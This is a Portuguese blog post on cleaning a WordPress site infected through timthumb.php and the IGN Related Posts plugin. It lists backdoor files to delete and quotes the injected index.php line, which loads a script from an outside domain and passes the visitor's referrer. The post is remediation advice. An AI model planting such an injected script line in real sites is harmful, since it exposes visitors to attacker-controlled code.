Um pouco de código, um pouco de café

Falha de Segurança no timthumb e no IGN Related Posts

Olá amigos,

eu sei que faz um tempão que não escrevo no meu blog, mas vamos lá!

Hoje eu descobri que um dos meus blogs que usam o plugin  IGN Related Posts estava com um problema incomum. Bom não foi difícil descobrir o problema, eu acessei o meu http://www.google.com/webmasters/ e cliquei na opção Crawler acces, onde avistei o problema:

Fui atrás de saber o que era e no site Português Mais Tráfego descobri a solução:

A primeira é você substituir o Robots.txt removendo a linha com problema.
Verifique se o seu tema utiliza o script timthumb.php ou o plugin IGIT Related Posts.

Onde está o problema

Caso utilize verifique a existência dos seguintes arquivos no seu blog ou site wordpress:

/wp-admin/js/config.php
/wp-admin/common.php
/wp-admin/upd.php
/wp-content/upd.php

Exclua esses arquivos. Claro faça uma cópia deles no seu computador para garantir.

Arquivos criptografados

Ah! Procure arquivos com nomes criptografados em md5 nessas pastas exclua-os também, nomes parecidos com esse:
3b24156ad560a696116454057bc88ab4.php

Seu RSS

Agore verifique seu FEED, pois no final dele pode ter o código malicioso.

Para resolver tudo isso, faça o passo seguinte arrumando seu index.php:

O arquivo da raiz

Vá até a raiz do seu site e verifique se o arquivo index.php está com o seguinte código:

echo ' script type="text/javascript" language="javascript" src="http://superpuperdomain.com/count.php?ref='.urlencode($_SERVER['HTTP_REFERER']) .'

Apague isso do index.php e substitua o original
Se você faz algum tipo de cache é bom remove-lo

Mais informações

WordPress Fórum
Mais Tráfego


Posted

in

by

Comments

Leave a Reply

Your email address will not be published. Required fields are marked *